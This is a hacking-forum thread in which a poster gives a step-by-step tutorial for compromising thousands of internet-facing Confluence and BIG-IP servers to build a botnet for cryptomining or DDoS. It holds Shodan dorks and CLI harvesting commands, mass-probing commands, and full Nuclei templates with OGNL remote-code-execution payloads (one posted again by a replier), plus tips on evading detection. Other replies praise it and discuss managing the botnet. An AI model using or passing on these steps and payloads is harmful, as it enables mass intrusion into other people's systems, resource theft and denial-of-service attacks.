Return to forum

Nu11Bi7 · July 24, 2022 at 8:23 AM

Hello And Welcome it's Nu11BI7

I WILL TRY TO TECH&EXPLAIN HOW TO Gather some zombies for cryptojacking stuff or DDOS attack or any thing u may use alot of hacked pc&VPS to do stuff for you

Summary:
we will search in shodan by dorks for Cves [website for monitor ip cross world ] we will get list of ips and scan it for CVE by Nucli Templates > got more than 10k hacked device (randomly) Note:Number depend on CVE you choose to search for

Req:

1.shodan account with membership
membership cost in shodan 50$ or you can get it for free if you have (.edu) mail check my THread for selling edu mails here "/Thread-Selling-500k-private-working-edu-mails"
2.vpn ( mulvad or proton ) refer to OPSEC Threads
3.basic scripting skills

Let's Began ...
after getting your shodan membership and VPN setup probably
step 1. Search for new CVEs (RCE only ) know how it works and study it will

we will use 2 CVEs for this Threads

1.CVE-2022-26134 [X-Confluence] *RCE*
2.CVE-2022-1388 [BIG-IP Firewall] *RCE*

Take a look at both CVEs and POC in GitHub

step 2. now you understand why this CVEs exists make a dork for shodan using unique identifier for this services

1. dork for CVE-2022-26134 [ X-Confluence]

2. dork for CVE-2022-1388 [ http.title:"BIG-IP®-+Redirect"]
those two dorks for shodan search

step3. we will using shodan CLI to grab IPs related to this service


shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt

now you should see list of IPs with ports

[attachment=732]

step4. we will use httprobe or httpx to see live hosts

 cat hosts | httprobe -c 50 | tee live_hosts.txt

step5. we will use nucli for automate testing for vuln exists
since we now using 1st cve {Confluence} we will use this template


info: 
  name: Confluence - Remote Code Execution 
  author: pdteam,jbertman 
  severity: critical 
  description: | 
    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. 
  reference: 
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis 
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html 
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ 
    - https://jira.atlassian.com/browse/CONFSERVER-79016 
  classification: 
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 
    cvss-score: 9.8 
    cve-id: CVE-2022-26134 
    cwe-id: CWE-74 
  metadata: 
    shodan-query: http.component:"Atlassian Confluence" 
    verified: "true" 
  tags: cve,cve2022,confluence,rce,ognl,oast,cisa 
 
requests: 
  - method: GET 
    path: 
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionCont
ext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" 
      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" 
 
    stop-at-first-match: true 
    req-condition: true 
    matchers-condition: or 
    matchers: 
      - type: dsl 
        dsl: 
          - 'contains(to_lower(all_headers_1), "x-cmd-response:")' 
 
      - type: dsl 
        dsl: 
          - 'contains(interactsh_protocol, "dns")' 
          - 'contains(to_lower(response_2), "confluence")' 
        condition: and 
 
    extractors: 
      - type: kval 
        part: header 
        kval: 
          - "x_cmd_response" 
 
# Enhanced by mp on 2022/07/04

Save it under attack.yaml
step 6. now we will pass live hosts to this templates

cat live_hosts.txt | nucli -bs 50 -c 50 -t attack.yaml

Now you should wait and watch your zombies pop up in front of your eyes. Now you can use those hacked devices to install cryptominner or DDOS attack or anything. A new thread will be for how to autmoate those hacked devices by python to make tasks for you. Stay ahead and wait for more
[attachment=733]
Important notes:
Don't use this method without hiding yourself.
Don't try this without knowing what you do.
Don't ssh to any hacked device from your local PC.
Don't mine to your BitCoin wallet (xmr only).
Don't be a dumbass.
This is basic method not advanced
Tools used : httprobe | shodan cli | nucli

Don't Forget to reputation :)

#Nu11BI7

tilly · July 24, 2022 at 1:01 PM

Was fun to read, but the formatting is a bit scuffed.

Nu11Bi7 · July 24, 2022 at 1:35 PM

(July 24, 2022, 01:01 PM)tilly Wrote: Was fun to read, but the formatting is a bit scuffed.

edited :)

TheElephantShow · July 24, 2022 at 3:46 PM

Holy shit my fucking eyes are bleeding and i want to cut your fucking hands off. Nobody should ever allow you near a computer, server, smartphone, internet enabled toaster or anything else with the kind of formatting and error riddled shit you share....

my guy if youre going to share a yaml template for nuclei dont ever do it the way you did here ffs. If you cant use the forum code tag properly then just paste that shit somewhere. This fucking helped nobody i guarantee it lmao

TheElephantShow · July 24, 2022 at 3:57 PM

example

id: CVE-2022-26134

info:
  name: Confluence - Remote Code Execution via OGNL template injection
  author: pdteam
  severity: critical
  description: |
    Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
  classification:
    cve-id: CVE-2022-26134
  tags: cve,cve2022,confluence,rce,ognl,oast

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: response
        words:
          - "Confluence"
        case-insensitive: true

Nu11Bi7 · July 24, 2022 at 6:32 PM

(July 24, 2022, 03:46 PM)TheElephantShow Wrote: Holy shit my fucking eyes are bleeding and i want to cut your fucking hands off. Nobody should ever allow you near a computer, server, smartphone, internet enabled toaster or anything else with the kind of formatting and error riddled shit you share....

my guy if youre going to share a yaml template for nuclei dont ever do it the way you did here ffs. If you cant use the forum code tag properly then just paste that shit somewhere. This fucking helped nobody i guarantee it lmao

Yes,Thanks for the advice, anyway i was type in BB code not GUI you could say it in a better way ,
i edited it i hope you likes it :)

Max · July 24, 2022 at 7:52 PM

Formatting hurt my brain.

slyat · July 25, 2022 at 1:28 PM

Gathering vulnerable IPs is not hard and you described it quite well, but another import thing is to manage the botnet gracefully.
Usually, a botnet which is built in your way has more than 100 machines, using cs or msf to manage them will make a mess.

Mr_Muuuushuuuu · August 10, 2022 at 5:11 AM

I enjoyed this read thanks for posting! 😎

hunterb0y7z · September 1, 2022 at 1:31 PM

Thaaaaaaaaaanks for sharing bro!!